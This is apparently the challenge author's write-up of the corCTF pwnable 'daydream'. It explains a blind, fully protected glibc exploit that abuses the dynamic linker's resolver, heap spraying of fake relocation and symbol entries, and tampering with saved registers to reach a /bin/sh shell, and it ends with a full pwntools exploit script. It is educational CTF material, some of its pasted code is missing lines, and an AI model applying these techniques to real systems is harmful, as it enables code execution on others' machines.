I’ve always liked problems that were easy to state but hard to solve. The barrier for entry to corCTF pwn challenges are typically very high—µarch and kernel are large departures from the more comfortable heap notes, so “daydream” as was designed to be more accessible. This was not at the cost of difficulty. At the end of the CTF, it was one of the two pwn challenge to remain unsolved.
“daydream” is a short glibc pwnable. In fact, here’s the source code for the challenge:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
int main()
uint8_t bytes[16] = {0};
size_t idx, value = 0;
setbuf(stdin, malloc(0x2000));
while (!bytes[0])
scanf("%ld %ld", &idx, &value);
bytes[idx] = value;
The description and name of the challenge hints at its relationship with “nightmare”, my challenge for DiceCTF 2022 (this writeup does not require understanding it, however it is strongly encouraged). This was a nudge and indicator that this is also a linker challenge.
In short, the linker—also fancily called the runtime loader or dynamic linker to distinguish it from the compile-time linker—is the program that loads programs into memory. Typically, you’ll see this as some form of “ld-linux-x86-64.so.2” loaded as a shared library. All non-statically compiled programs use the linker, making it a near universal attack surface.
A less subtle indicator for the linker, this challenge is also blind with all protections enabled. The executor for this challenge does not provide stdout, so all exploitation must occur without knowing any addresses in memory. Previously, there weren’t general strategies for blind-fullprot challenges (how does one encode executing a onegadget or system without specifying where either are located in memory?). Linker exploits can help with that! For example, ret2dlresolve is already a well-known and used trick.
The program allows you to write whatever byte you want a relative offset from a stack buffer. Writing anything that’s not 0 to index 0 causes the program to return. It has all protections enabled, hides stdout, and has anti-bruteforce protection.
First off, the only complex surface accessed before returning is “scanf”. However, it doesn’t use the values of anything we can write on the stack, so we cannot interfere with it. Similarly, returning from main doesn’t access stack variables. This means we must modify the return address. Because of the anti-bruteforce protection, we can only expect the bottom 12 bits to be constant. This means, as a first step, we can only modify the least significant byte, or LSB, of the return address for a consistent exploit.
This is our return address.
We can return anywhere in a 255 byte range by setting the last byte
to any
value between 00
and ff
. But where will we return? We can view all the
options here:
Well, what do we want out of the code that we’ll return to? It’ll have to reference data on the stack, since there’s simply not enough entropy in the registers we affect to encode “give me a shell”.
Some attempts included jumping to b2
since we control the syscall number, but
we don’t have sufficient control over the other registers to any meaningful
syscall besides sigreturn
. However, even with sigreturn
, we can’t construct
a valid instruction pointer, so this avenue isn’t useful.
Another, more fruitful attempt, is to rewind just a few bytes back in
, to 76
Here, we load local variables off the stack and call [rsp+8]
. This is the main
function, and the arguments to it are the argument count, arguments, and the
environment variables. These, except for the enviroment variables, are also held
on the stack. Using 76
intuitively makes sense, because we know before calling
(where our return pointer is near) we need to load the function and its
arguments, a process we can easily interfere with.
We can modify argc
and argv
on the stack, as well as the pointer to main
We are in a similar situation now, able to call anything in a 255 byte range
near main
by modifying its LSB, but also with argument control. What should we
call? Here are our options:
There are two interesting targets here: scanf@plt
, and the PLT trampolines.
Ideally, we could call scanf
with arguments we control and get a format string
exploit. However, since argc
is 4 bytes, it can’t hold a pointer. Perhaps, in
a different world, argv
is the first argument to the main function, making
this challenge trivial :P
I discuss PLT functions more in my writeup to
nightmare, but the gist is that
there are two code segments for each symbol: .plt
functions and PLT
trampolines. .plt
functions are just jumps to whatever’s being held in the GOT
entry associated with this symbol. This is what functions like main
call into.
For example, here’s the .plt
function associated with scanf
PLT trampolines are the initial value of a symbol’s GOT entry, which calls a
“resolver” function (such as _dl_runtime_resolve_fxsave
) that overwrites the
GOT entry with the actual address of the symbol in the library (such as system
or scanf
). They are typically structed as a push of the index associated with
the symbol and jump to the resolver dispatcher. We won’t go into how these
indicies are used right now. The resolver dispatcher just jumps to
, which will take the index and translate it to an
the actual function address. Here’s the PLT trampoline for scanf
. We can see
that the index associated with scanf
is 0x3
And the dispatcher, at 020
We can see in the GOT that most symbols are resolved, while __stack_chk_fail
still points to its PLT trampoline. This makes sense, since the GOT entry hasn’t
been overwritten by the resolver:
To summarize, .plt
functions call whatever’s in the GOT. PLT trampolines put
stuff in the GOT and call external symbols. They jump to the
At this point, you might start brewing an interesting—but nearly
impossible—plan. “If we could call the resolver dispatcher, at 20
, with our
own index, argc
, perhaps we could have our own symbol resolved, like
?”, many competitors thought.
Moonshine! That can’t be possible. First off, the calling convention for the
resolver dispatcher uses stack arguments, not registers. If we called the
dispatcher, we’d end up pushing the return address of the call rather than the
index we wanted to use. Besides, the indexes, like scanf
’s 0x3
, are used to
index tables, such as symtab
or strtab
, stored in the binary. Even if you
could index those tables out-of-bounds, it wouldn’t matter, since you don’t
control anything inside the binary. It’s just not possible.
First, we need to figure out how to jump to 20
rather than calling it. This is
so we don’t push a return address on the stack, preventing us from specifying an
arbitrary index.
When calling a function, the epilogue assumes the size of the stack frame. Specifically, it assumes the stack has grown by the amount the prologue of the function has defined. In the case of the main function, the prologue looks like:
The three pushes
sub rsp, 0x30
cause the stack frame to be 0x48
bytes. The epilogue,
similarily, does add rsp, 0x30
and three pops:
However, if we called main+16
, for example, skipping a few pushes in the
prologue of the function, the epilogues assumptions on the stack frame’s size is
invalidated. The prologue didn’t grow the stack frame as much as the epilogue
assumes, causing the epilogue to eat in the previous functions stack frame. We
can select the number of pushes we’d like to skip to overlap our stack frame
with the previous one.
In this case, we can skip two pushes to overlap the return address of main
stack frame with the local variable, main
, in __libc_start_call_main
’s stack
frame. This is the main function __libc_start_call_main
calls. By tweaking the
LSB of main
, we can return into the PLT dispatcher! Writing the index we’d
like to use under this return address allows us to emulate pushing it to the
SprayingOkay, that’s cool, but what’s the point if the index won’t point to our data?
Well, if you’ve read
this writeup on zelda (or perhaps seem
many vmmap
s before), you’ll know that the heap is awfully close to the loaded
binary. Sure enough, if you look at the
kernel source,
the heap is a random offset from the end of the binary, in the range from
(0x0, 0x2000000)
We do control data on the heap. scanf
requests characters from the
object, which reads bytes in chunks of in 0x2000
. One
strategy we could try is creating a fake relocation object on the heap, and then
guess the offset to index it. However, this requires bruteforce! What can we do?
By repeatedly calling the main
function in a loop, we can keep creating new
backing buffers for stdin
. We can fill all 0x2000
bytes, repeating our
symbol object at intervals of 0x1000
. If we do this 4096 times, then we’d
allocate 0x2000000
bytes of controlled data. If we then supply an index that’s
bytes off the end of the binary, we’re guaranteed to read the symbol
either at the start of the heap, or the end of the heap. Spraying is a powerful
technique that can often get around ASLR!
To summarize what we’ve done so far, we’ve overwritten the LSB of the return
address to rewind __libc_start_call_main
so that it reads the address of
off the stack. It will continually call main
, spraying the stdin
input buffer over the heap. We then change the address of main
’s LSB on the
stack so it points to main+16
. Then, when main
returns, we call main+16
We change the return address, also main+16
, to the resolver dispatcher. We
also write the index of the maximum heap offset, 0x2000000
, under the return
address. After main+16
returns, it’ll jump to the dispatcher with the index at
the top of the stack.
Calling an arbitrary symbol isn’t enough to get remote code execution. Even if
you can call system
, what does it matter if you can’t control what rdi
points to? We can’t call a one gadget since it’s not a well defined symbol, and
even if we could, the constraints aren’t satisfied. If only it was possible to
modify the register state somehow…
’s internal stateThe underlying resolver called by the resolver dispatcher is a wrapper around
the function _dl_fixup
. It first stores all the registers interal state on the
stack, calls _dl_fixup
using the stack arguments, and then restores the
register state. The idea behind it is that _dl_fixup
is a foriegn function
that may clobber the program state in unexpected ways, so we account for that by
saving the state to the stack.
By creating a symbol which calls into main
(again) using a STT_GNU_IFUNC
, we
can not only modify the local variables of _dl_fixup
, but also register state
stored by _dl_runtime_resolve_xsavec
. Specifically, with an LSB overwrite, we
can cause the resolved symbol, _dl_fixup
’s return value, to be the resolver
dispatcher, allowing us to call _dl_fixup
on the next index on the stack. This
is useful, because we can modify the register state with our stack write before
calling into the dispatcher.
Specifically, we’d like to get rdi
pointing at “/bin/sh”. rdi
is set to a
stack buffer used by scanf
for storing the last read value. We can modify the
saved rdi
in _dl_runtime_resolve_xsavec
, setting its last two bytes to 00
The overall effect is that rdi
points much higher on the stack, safe from
getting clobbered by _dl_fixup
when we call system
. We can then spray
0x10000 / 8
“/bin/sh”s over the stack, and we’ll be guarenteed to have rdi
point to them once _dl_runtime_resolve_xsavec
restores it. From there, we just
choose a different symbol index that’ll resolve system
Let’s put this into action, calling a symbol we desire. I’m skipping over a few
implementation details (Technically the allocation size is 0x2010
, since the
chunk header occupies 0x10
bytes. This means we need to shift around our spray
inside the input buffer to stay aligned to 0x1000
byte boundaries.
Additionally, because we have to have valid indicies for tables of different
sizes, we need to have larger sprays. For example, if we index a table with
1-byte-sized elements at index 0x2000000
, indexing a table with 2-byte-sized
elements would be at the logical byte offset 0x2000000 * 2
, or 0x4000000
First, I’ll create a wrapper for the payload creation. It’ll make creating sprays easier.
class Buffer(io.BytesIO):
# fills the rest of the stdin buffer
def commit(self):
self.write(b"\x00" * (0x2000 - (self.tell() % 0x2000)))
def swrite(self, where, what):
self.write(f"{where} {what}".encode() + b"\n")
def write_bytes(self, where, what):
for i in range(len(what)):
self.swrite(where + i, what[i])
buf = Buffer()
Then, I’ll define some constants for the location of the return address,
, and the local variable main
ret_addr = 0x38
main_addr = ret_addr + 0x10
Now, I’ll calculate the required indices for each table:
maximum_heap_offset = 0x2000000
payload_offset = (
maximum_heap_offset + 0x5000 + 0xBA8
) # offset from start of binary space
assert (payload_offset - bin.dynamic_value_by_tag("DT_JMPREL")) % 0x18 == 0
plt_idx = (
payload_offset - bin.dynamic_value_by_tag("DT_JMPREL")
) // 0x18 # offset from start of binary space
symtab_idx = (
payload_offset + 0x18 - bin.dynamic_value_by_tag("DT_SYMTAB")
) // 0x18 # offset from start of binary space
ver_idx = (payload_offset + 0x18 - bin.dynamic_value_by_tag("DT_VERSYM")) // 0x2
strtab_idx = (
payload_offset + 0x18 * 2 + 0x8 - bin.dynamic_value_by_tag("DT_STRTAB")
) # offset from start of binary space
We’ll then actually create the symbol structures, into a simple sprayable
fake_symtab_entry = (
p32(0x17) + p8(10) + p8(1) + p16(0) + p64(bin.symbols["main"]) + p64(0)
) + (p32(strtab_idx) + p8(10) + p8(0) + p16(0) + p64(0xDEADBEEF) + p64(0))
fake_reloc_entry = (p64(0x4018) + p32(7) + p32(ver_idx) + p64(0)) + (
p64(0x4018) + p32(7) + p32(ver_idx + 1) + p64(0)
fake_vertab_entry = p64(0x03) + b"system\x00"
payload = fake_reloc_entry + fake_vertab_entry
We’ll then actually spray this payload over the heap, at intervals of 0x1000
for i in range(maximum_heap_offset // 0x2000 * 0xC):
# write payload at offsets
symtab_offset = 0x908 + 0xF0
reloc_symtab_offset = 0x908
# create series of writes and the indexes they need to be written at
payload_offsets = sorted(
((reloc_symtab_offset - i * 0x10) % 0x2000, payload),
((reloc_symtab_offset + 0x1000 - i * 0x10) % 0x2000, payload),
((symtab_offset - i * 0x10) % 0x2000, fake_symtab_entry),
((symtab_offset + 0x1000 - i * 0x10) % 0x2000, fake_symtab_entry),
key=lambda x: x[0],
spray_buf = Buffer()
for offset, dat in payload_offsets:
if offset > 0x2000 - len(dat):
spray_buf.swrite(ret_addr, 0x76) # recall main on ret
spray_buf.swrite(0, 0xFF)
Now that we’ve sprayed our symbol data over the heap, we call overlap the stack
frames of main
and __libc_start_call_main
# set lsb to main+0x10 to misalign the stack by 0x10 bytes
buf.swrite(main_addr, 0xD0)
# set lsb of __libc_start_call_main to recall main+0x10
buf.swrite(ret_addr, 0x76)
# set edi to large malloc (local variable argc by __libc_start_call_main)
buf.write_bytes(main_addr + 0x8 + 0x4, p32(0x2000))
buf.swrite(0, 0xFF)
After we’ve returned from main
, we’ll modify the return address of main+16
to point to the resolver dispatcher.
# reset
buf.swrite(0, 0)
# plt resolver addr
buf.swrite(ret_addr, 0x20)
# set plt index, which should be on the heap. this'll call main
buf.write_bytes(ret_addr + 0x8, p64(plt_idx))
# this'll also call main. it's for stack alignment.
buf.write_bytes(ret_addr + 0x10, p64(plt_idx))
# this'll call system.
buf.write_bytes(ret_addr + 0x18, p64(plt_idx + 1))
buf.swrite(0, 0xFF)
Now, once we’re in the main invoked within _dl_fixup
, we’ll modify internal
state of _dl_fixup
and _dl_runtime_resolve_xsavec
# hop _dl_fixup to alternate branch that uses stack variable for return value
buf.swrite(ret_addr, 0xA4)
# set lsb of return value of _dl_fixup to dispatch resolver
buf.swrite(ret_addr + 0x10, 0x20)
# set saved rdi bottom two bytes to 0000
buf.write_bytes(0xA0, p16(0x0000))
buf.swrite(0, 1)
We’ll spray “/bin/sh” over where rdi
points in the next iteration of main
spray = b"/bin/sh\x00" * 0x2000
buf.write_bytes(-0x10000, spray)
buf.swrite(0, 1)
Now, the next input proccessed will be by /bin/sh
! Let’s get the flag and win.
buf.write(b"cat /flag\nexit\n")
Here’s the exploit in its entirety.
from pwn import *
import io
bin = ELF("./daydream")
# r = process(bin.path)
# r = remote("localhost", 5000)
# r = process(["python3", "main.py"])
# gdb.attach(r, "break *_dl_fixup+81\nbreak *main+152")
# gdb.attach(r, "break *_dl_fixup+608\nbreak *_dl_runtime_resolve_xsavec+186")
class Buffer(io.BytesIO):
def commit(self):
self.write(b"\x00" * (0x2000 - (self.tell() % 0x2000)))
def swrite(self, where, what):
self.write(f"{where} {what}".encode() + b"\n")
def write_bytes(self, where, what):
for i in range(len(what)):
self.swrite(where + i, what[i])
buf = Buffer()
ret_addr = 0x38
main_addr = ret_addr + 0x10
maximum_heap_offset = 0x2000000
payload_offset = (
maximum_heap_offset + 0x5000 + 0xBA8
) # offset from start of binary space
assert (payload_offset - bin.dynamic_value_by_tag("DT_JMPREL")) % 0x18 == 0
plt_idx = (
payload_offset - bin.dynamic_value_by_tag("DT_JMPREL")
) // 0x18 # offset from start of binary space
symtab_idx = (
payload_offset + 0x18 - bin.dynamic_value_by_tag("DT_SYMTAB")
) // 0x18 # offset from start of binary space
ver_idx = (payload_offset + 0x18 - bin.dynamic_value_by_tag("DT_VERSYM")) // 0x2
strtab_idx = (
payload_offset + 0x18 * 2 + 0x8 - bin.dynamic_value_by_tag("DT_STRTAB")
) # offset from start of binary space
fake_symtab_entry = (
p32(0x17) + p8(10) + p8(1) + p16(0) + p64(bin.symbols["main"]) + p64(0)
) + (p32(strtab_idx) + p8(10) + p8(0) + p16(0) + p64(0xDEADBEEF) + p64(0))
fake_reloc_entry = (p64(0x4018) + p32(7) + p32(ver_idx) + p64(0)) + (
p64(0x4018) + p32(7) + p32(ver_idx + 1) + p64(0)
fake_vertab_entry = p64(0x03) + b"system\x00"
payload = fake_reloc_entry + fake_vertab_entry
for i in range(maximum_heap_offset // 0x2000 * 0xC):
# write payload at offsets
# reloc_symtab_offset = 0x908
symtab_offset = 0x908 + 0xF0
reloc_symtab_offset = 0x908
payload_offsets = sorted(
((reloc_symtab_offset - i * 0x10) % 0x2000, payload),
((reloc_symtab_offset + 0x1000 - i * 0x10) % 0x2000, payload),
((symtab_offset - i * 0x10) % 0x2000, fake_symtab_entry),
((symtab_offset + 0x1000 - i * 0x10) % 0x2000, fake_symtab_entry),
key=lambda x: x[0],
spray_buf = Buffer()
for offset, dat in payload_offsets:
if offset > 0x2000 - len(dat):
spray_buf.swrite(ret_addr, 0x76)
spray_buf.swrite(0, 0xFF)
# set lsb to main+0x10 to misalign the stack by 0x10 bytes
buf.swrite(main_addr, 0xD0)
# set lsb of __libc_start_call_main to recall main+0x10
buf.swrite(ret_addr, 0x76)
# set edi to large malloc (local variable argc by __libc_start_call_main)
buf.write_bytes(main_addr + 0x8 + 0x4, p32(0x2000))
buf.swrite(0, 0xFF)
# reset
buf.swrite(0, 0)
# plt resolver addr
buf.swrite(ret_addr, 0x20)
# set plt index, which should be on the heap. this'll call main
buf.write_bytes(ret_addr + 0x8, p64(plt_idx))
# this'll also call main. it's for stack alignment.
buf.write_bytes(ret_addr + 0x10, p64(plt_idx))
# this'll call system.
buf.write_bytes(ret_addr + 0x18, p64(plt_idx + 1))
buf.swrite(0, 0xFF)
# hop dl_fixup to alternate branch that uses stack variable for return value
buf.swrite(ret_addr, 0xA4)
# set lsb of return value of _dl_fixup to dispatch resolver
buf.swrite(ret_addr + 0x10, 0x20)
# set saved rdi bottom two bytes to 0000
buf.write_bytes(0xA0, p16(0x0000))
buf.swrite(0, 1)
buf.swrite(ret_addr, 0xA4)
buf.swrite(ret_addr + 0x10, 0x20)
spray = b"/bin/sh\x00" * 0x2000
buf.write_bytes(-0x10000, spray)
buf.swrite(0, 1)
buf.write(b"cat /flag\nexit\n")
# write buf to file
with open("exploit", "wb") as f:
Linker exploits are really neat. They can make unsolvable challenges solvable,
thanks to their ASLR independent nature. I hope this inspires you to poke around
in _dl_fixup
yourself :D